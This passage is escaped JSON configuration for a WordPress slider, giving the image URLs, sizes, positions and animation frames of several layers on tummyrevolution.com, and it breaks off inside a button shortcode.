hiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"List\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic5-1.png\",\"imageId\":3262},\"size\":{\"width\":{\"d\":{\"v\":\"235px\",\"e\":true},\"n\":{\"v\":\"160px\",\"e\":true},\"t\":{\"v\":\"160px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"75px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"53px\",\"e\":true}},\"originalWidth\":235,\"originalHeight\":110,\"aspectRatio\":{\"d\":{\"v\":2.1363636363636362},\"n\":{\"v\":2.1363636363636362},\"t\":{\"v\":2.1363636363636362},\"m\":{\"v\":2.1363636363636362}}},\"position\":{\"x\":{\"d\":{\"v\":\"745px\",\"e\":true},\"n\":{\"v\":\"530px\",\"e\":true},\"t\":{\"v\":\"-36px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"270px\",\"e\":true},\"t\":{\"v\":\"197px\",\"e\":true},\"m\":{\"v\":\"181px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":710},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1360,\"start\":710,\"startRelative\":710},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1360,\"start\":710,\"startRelative\":710},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":930,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Image 3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic4.png\",\"imageId\":3263},\"size\":{\"width\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"167px\",\"e\":true},\"t\":{\"v\":\"167px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"37px\",\"e\":true},\"t\":{\"v\":\"37px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"originalWidth\":284,\"originalHeight\":63,\"aspectRatio\":{\"d\":{\"v\":4.507936507936508},\"n\":{\"v\":4.507936507936508},\"t\":{\"v\":4.507936507936508},\"m\":{\"v\":4.507936507936508}}},\"position\":{\"x\":{\"d\":{\"v\":\"262px\",\"e\":true},\"n\":{\"v\":\"176px\",\"e\":true},\"t\":{\"v\":\"28px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"379px\",\"e\":true},\"n\":{\"v\":\"282px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"185px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1300,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1300,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Image 4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic6-1.png\",\"imageId\":3264},\"size\":{\"width\":{\"d\":{\"v\":\"257px\",\"e\":true},\"n\":{\"v\":\"165px\",\"e\":true},\"t\":{\"v\":\"165px\",\"e\":true},\"m\":{\"v\":\"92px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"18px\",\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"originalWidth\":257,\"originalHeight\":28,\"aspectRatio\":{\"d\":{\"v\":9.178571428571429},\"n\":{\"v\":9.178571428571429},\"t\":{\"v\":9.178571428571429},\"m\":{\"v\":9.178571428571429}}},\"position\":{\"x\":{\"d\":{\"v\":\"29px\",\"e\":true},\"n\":{\"v\":\"-1px\",\"e\":true},\"t\":{\"v\":\"-139px\",\"e\":true},\"m\":{\"v\":\"-123px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"274px\",\"e\":true},\"t\":{\"v\":\"274px\",\"e\":true},\"m\":{\"v\":\"179px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":640},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1350,\"start\":640,\"startRelative\":640},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1350,\"start\":640,\"startRelative\":640},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1010,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic3-1.png\",\"imageId\":3265},\"size\":{\"width\":{\"d\":{\"v\":\"507px\",\"e\":true},\"n\":{\"v\":\"410px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"297px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"51px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"37px\",\"e\":true}},\"originalWidth\":507,\"originalHeight\":63,\"aspectRatio\":{\"d\":{\"v\":8.047619047619047},\"n\":{\"v\":8.047619047619047},\"t\":{\"v\":8.047619047619047},\"m\":{\"v\":8.047619047619047}}},\"position\":{\"x\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"-113px\",\"e\":true},\"t\":{\"v\":\"-169px\",\"e\":true},\"m\":{\"v\":\"-92px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"298px\",\"e\":true},\"n\":{\"v\":\"239px\",\"e\":true},\"t\":{\"v\":\"242px\",\"e\":true},\"m\":{\"v\":\"151px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1360,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1360,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1020,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"[qodef_button text=\\\"view more\\\" target=\\\"_self\\\" icon_pack=\\\"\\\" font_weight=\\\"\\\" 